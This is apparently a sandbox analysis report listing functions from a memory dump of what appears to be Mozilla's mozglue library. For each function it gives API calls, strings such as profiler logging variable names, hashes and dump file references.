Opcode Fuzzy Hash: 517f52036b8995099fd29cf68dbc2093c914829d08eff4cfb82d83c71c328f8e
Instruction Fuzzy Hash: 4C51C071E052049BEB00DF68C8447EEB7B0BF69318F44842DE8556BB90F731A989C7E2

Function 6CD0A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CD0A565

Part of subcall function 6CD0A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD0A4BE
Part of subcall function 6CD0A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CD0A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CD0A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CD0A6B6

Strings

z, xrefs: 6CD0A6AE
0, xrefs: 6CD0A5FB

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 9e7df8defa413f04767312cc3df0cea3fe702a414102f8479c8a8dfbebfb3255
Instruction ID: c07ce6f6cce1d3c6a39487b161882d56891d7b7862cd19c99f83a146f97d2a47
Opcode Fuzzy Hash: 9e7df8defa413f04767312cc3df0cea3fe702a414102f8479c8a8dfbebfb3255
Instruction Fuzzy Hash: 2041E771A097459FC341DF28C480A9FBBF5BF89354F908A2EE49987650EB30D549CB92

Function 6CCD9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
__Init_thread_footer.LIBCMT ref: 6CCD949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6CCD947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CCD9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CCD946B

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 724963eddf0c56bfaa3d8352bb076c3be882a3715242f1be7f64f4794848707f
Instruction ID: 3ce709e600e1f80dbf6ef5604d6d420f1b5bc4f43ae0c13c0d081e27179864d6
Opcode Fuzzy Hash: 724963eddf0c56bfaa3d8352bb076c3be882a3715242f1be7f64f4794848707f
Instruction Fuzzy Hash: D701F534A041008BF700DB9EF826A453278AB4632EF05053AEB0686F52FA31E55AC95B

Function 6CD0B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CD0B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CD0B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CD0B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CD0B5F4
__Init_thread_footer.LIBCMT ref: 6CD0B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CD0B61F
std::_Facet_Register.LIBCPMT ref: 6CD0B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CD0B655

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 12e7752d42a752580dd8a8668af0aa670802322be4073cf08df7ac144eb07d8c
Instruction ID: 63fa8cc9ed755cb856ca9614e8e1f6f10a6163533e45e155b2ff0090a54b8829
Opcode Fuzzy Hash: 12e7752d42a752580dd8a8668af0aa670802322be4073cf08df7ac144eb07d8c
Instruction Fuzzy Hash: B031B5B1B04104DBEB04DFA9C85A9AEB7B9FF8A324F140555DA0697F90DB30A807CF91

Function 6CCE1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCE1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6CCE1BE3,?,?,6CCE1D96,00000000), ref: 6CCE1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6CCE1BE3,?,?,6CCE1D96,00000000), ref: 6CCE1D4C
GetCurrentThreadId.KERNEL32 ref: 6CCE1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCE1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCE1DDA

Part of subcall function 6CCE1EF0: GetCurrentThreadId.KERNEL32 ref: 6CCE1F03
Part of subcall function 6CCE1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CCE1DF2,00000000,00000000), ref: 6CCE1F0C
Part of subcall function 6CCE1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CCE1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CCE1DF4

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 6ba1e70f6a6f50e39bb69e32fb3ac0fffc72431ff9349bd24e4bc8feef7ee344
Instruction ID: 5097240f4d284cb825d2c9109720c93c2d42c500da787f53f1b5c86727f12bb4
Opcode Fuzzy Hash: 6ba1e70f6a6f50e39bb69e32fb3ac0fffc72431ff9349bd24e4bc8feef7ee344
Instruction Fuzzy Hash: 0B4189B5200700AFDB14DF29C489A56BBF9FB89314F10446EEA5A87B42DB71F814CB91

Function 6CCD84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD85AC

Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD767F
Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD7693
Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD85B2

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 396041d2acb2ed29c46ef15ee623ab35adb6c9f1bc8f7b48f3fb8274796ebebc
Instruction ID: b06e50029424387ed73ed2bfc66c75da681df7a521ccb6103c38636a785d5aa8
Opcode Fuzzy Hash: 396041d2acb2ed29c46ef15ee623ab35adb6c9f1bc8f7b48f3fb8274796ebebc
Instruction Fuzzy Hash: 49217F742006019FEB14DB29C888E5AB7B9AF8530DF15482DE65B83B41FB35F949CB91

Function 6CCA1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6CCA1699
VerSetConditionMask.NTDLL ref: 6CCA16CB
VerSetConditionMask.NTDLL ref: 6CCA16D7
VerSetConditionMask.NTDLL ref: 6CCA16DE
VerSetConditionMask.NTDLL ref: 6CCA16E5
VerSetConditionMask.NTDLL ref: 6CCA16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CCA16F9

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: c95089f18614ace938b547bc0533ba947ad1f321fc6ce28e010303aacd27282a
Instruction ID: 76995c37d13ffab97bb905dd94fe075b9a21888c700147486ef83fa5e8e2469b
Opcode Fuzzy Hash: c95089f18614ace938b547bc0533ba947ad1f321fc6ce28e010303aacd27282a
Instruction Fuzzy Hash: 8E21C0F0740208ABFB106BA88C8AFBBB37CEB86704F044528F6059BAD0D6749D5586A1

Function 6CCDF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CCDF598), ref: 6CCDF621

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDF637
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8,?,?,00000000,?,6CCDF598), ref: 6CCDF645
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8,?,?,00000000,?,6CCDF598), ref: 6CCDF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CCDF62A

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: bad5bb7f5292ac8610498a77722d1b46e4d6312f4faac0baf7e32775f96f3565
Instruction ID: 272bc599045c1481fe5b9b66c98f6b54db0313d15617ee60048d3ac6104c83b6
Opcode Fuzzy Hash: bad5bb7f5292ac8610498a77722d1b46e4d6312f4faac0baf7e32775f96f3565
Instruction Fuzzy Hash: 0311A775205205BFEA04AF59D8459957BBDFB86359B110019FB0583F41EB71F826CBA0

Function 6CCA0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CCCD9F0,00000000), ref: 6CCA0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CCA0F3C
__Init_thread_footer.LIBCMT ref: 6CCA0F50
FreeLibrary.KERNEL32(?,6CCCD9F0,00000000), ref: 6CCA0F86

Strings

CoInitializeEx, xrefs: 6CCA0F36
combase.dll, xrefs: 6CCA0F18

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 5a49c721d8e42604f582d2d25028ab568595a83f0dba1ec165f972ea0f02852c
Instruction ID: 09104393ebcf89f1faf0c839e1b8e29eadbcdb8bfaa13b5a04a61c775d551685
Opcode Fuzzy Hash: 5a49c721d8e42604f582d2d25028ab568595a83f0dba1ec165f972ea0f02852c
Instruction Fuzzy Hash: 16112E75705241DBFF00DF99DD1EA4A7B7DBB8A366F004229EA06A2F80E734A407CA55

Function 6CCDF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF561

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDF577
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF585
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6CCDF499
[I %d/%d] profiler_pause_sampling, xrefs: 6CCDF3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CCDF56A
[I %d/%d] profiler_resume, xrefs: 6CCDF239

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 0595c22010574d6ae148ef5f43f29d3d12e0e10181eb377e54cc3e20032276e1
Instruction ID: 13a6dc44e63e44adcca0b204cea029d3a3151f37ede00b1c2dd3d5e47d948b37
Opcode Fuzzy Hash: 0595c22010574d6ae148ef5f43f29d3d12e0e10181eb377e54cc3e20032276e1
Instruction Fuzzy Hash: DFF054B5600204AFFA00AB65984AA6A7BBDFB8629DF010015FB0583F42EB759806C765

Function 6CCA0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6CCA0DF8), ref: 6CCA0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CCA0EA1
__Init_thread_footer.LIBCMT ref: 6CCA0EB5
FreeLibrary.KERNEL32 ref: 6CCA0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6CCA0E9B
kernel32.dll, xrefs: 6CCA0E7D

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: f9291f6afcc3c869b9508099dea82d3d11cc105207bc66612be97a1c6b5ad8b9
Instruction ID: 307e991e26aa0f599400b566923d599c341d9957e3dde5c68a3193aa54092c1b
Opcode Fuzzy Hash: f9291f6afcc3c869b9508099dea82d3d11cc105207bc66612be97a1c6b5ad8b9
Instruction Fuzzy Hash: 68014B747042829BFF00AFE9D95AA4233BAF747359F104525DA0682FA0E730A80BDA02

Function 6CCD05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CCCCFAE,?,?,?,6CC931A7), ref: 6CCD05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CCCCFAE,?,?,?,6CC931A7), ref: 6CCD0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC931A7), ref: 6CCD061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC931A7), ref: 6CCD0627

Strings

<jemalloc>, xrefs: 6CCD05FA, 6CCD060F
: (malloc) Error in VirtualFree(), xrefs: 6CCD061B, 6CCD0625

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 6d4b0cf4334a866f3ab5d5acd0b3a5b37c7dd2e17cbcae53009bafefe6a36463
Instruction ID: 7d8fe8aee706008770b513e448f410e31afc0d148446a1649ce89f55346625dc
Opcode Fuzzy Hash: 6d4b0cf4334a866f3ab5d5acd0b3a5b37c7dd2e17cbcae53009bafefe6a36463
Instruction Fuzzy Hash: 0EE08CE2A1101037F514635AAC86EBB765CDBC6134F080039FE0D82311E94AAD1A51F7

Function 6CCA05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05c6c23e6ca059f1893895bb7723416a43ef4480451e1f4a6f14aa814478f57
Instruction ID: dfd7458892ba11e27a08a86cfdb6b7ad0d8f616ce66bf558d4f87008521c8f96
Opcode Fuzzy Hash: b05c6c23e6ca059f1893895bb7723416a43ef4480451e1f4a6f14aa814478f57
Instruction Fuzzy Hash: EDA149B0A00646CFDB14CF69C598B99FBF5BF49344F44866ED84A97B00E730A946CFA0

Function 6CCF14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCF14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCF14E2
GetCurrentThreadId.KERNEL32 ref: 6CCF1546
InitializeConditionVariable.KERNEL32(?), ref: 6CCF15BA
free.MOZGLUE(?), ref: 6CCF16B4

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: a4a83bdc60bb858d5994a63227b0d2aa1fa29c240923e87292a5579e4744ecb9
Instruction ID: f3434f1e720d1f09e44121020eae052417393da8a88af2df0d100a35247c410c
Opcode Fuzzy Hash: a4a83bdc60bb858d5994a63227b0d2aa1fa29c240923e87292a5579e4744ecb9
Instruction Fuzzy Hash: 3C61D2B1A007449FDB118F25C880BDEB7B5BF89308F44851DED9A57701EB35E94ACB91

Function 6CCEDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCEDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CCED38A,?), ref: 6CCEDC6F
